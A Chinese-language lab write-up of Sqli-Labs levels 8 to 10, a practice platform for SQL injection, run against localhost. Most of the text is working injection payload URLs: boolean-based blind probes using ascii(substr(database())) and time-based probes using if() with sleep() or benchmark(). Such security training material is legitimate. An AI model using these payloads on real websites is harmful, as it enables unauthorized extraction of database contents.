Sqli-Labs:Less8~10-writeup

Sqli-Labs是用来练习sql注入的好平台。project地址：https://github.com/Audi-1/sqli-labs
本文测试环境：使用phpstudy集成环境。mysql版本：5.5.53

Less-8 GET-Blind-Boolean Based- Single Quotes
Less-9 GET-Time based - Single Quotes
Less-10 GET-Blind-Time based - double quotes

Less 8

Less-8 GET-Blind-Boolean Based- Single Quotes
访问：

http://localhost:20000/sqllab/Less-8/?id=id=-1' or 1=1 %23

发现有 字符串You are in...........

访问:

http://localhost:20000/sqllab/Less-8/?id=id=-1' or 2=1 %23

发现字符串消失。因此我们可以利用基于页面的变化来进行盲注。
比如以下payload：

http://localhost:20000/sqllab/Less-8/?id=-1' or ( select ascii(substr(database(),1,1))<= 255 )%23


http://localhost:20000/sqllab/Less-8/?id=-1' or ( select ascii(substr(database() from 1 for 1))<= 255 )%23

即可根据二分法得到数据库名称。

Less 9

该关为GET-Time based - Single Quotes。基于时间的盲注
访问:

http://localhost:20000/sqllab/Less-9/?id=1' and sleep(5) %23

http://localhost:20000/sqllab/Less-9/?id=1' and sleep(10) %23

可以看到我们的sleep语句被带到了sql数据库中执行。

接下去可以利用sql中的if语句来进行注入，当条件正确则返回1，若不正确则sleep。

http://localhost:20000/sqllab/Less-9/?id=1' and if(ascii(substr(database(),1,1))<255,1,sleep(10) )%23

http://localhost:20000/sqllab/Less-9/?id=1' and if(ascii(substr(database(),1,1))<0,1,sleep(10) )%23

之后利用脚本即可获取数据库名称。

Less 10

Less-10 GET-Blind-Time based - double quotes
这个跟Less 9一样，只是由单引号变为了双引号。

http://localhost:20000/sqllab/Less-10/?id=1" and if(ascii(substr(database(),1,1))<255,1,sleep(10) )%23

http://localhost:20000/sqllab/Less-10/?id=1" and if(ascii(substr(database(),1,1))<0,1,sleep(10) )%23

除了sleep，还有benchmark函数来进行时间盲注。

BENCHMARK(count,expr)

BENCHMARK()函数重复countTimes次执行表达式expr

访问：

http://localhost:20000/sqllab/Less-10/?id=1" and if(ascii(substr(database(),1,1))<255,1,benchmark(10000000,md5('a')) )%23

访问:

http://localhost:20000/sqllab/Less-10/?id=1" and if(ascii(substr(database(),1,1))<0,1,benchmark(10000000,md5('a')) )%23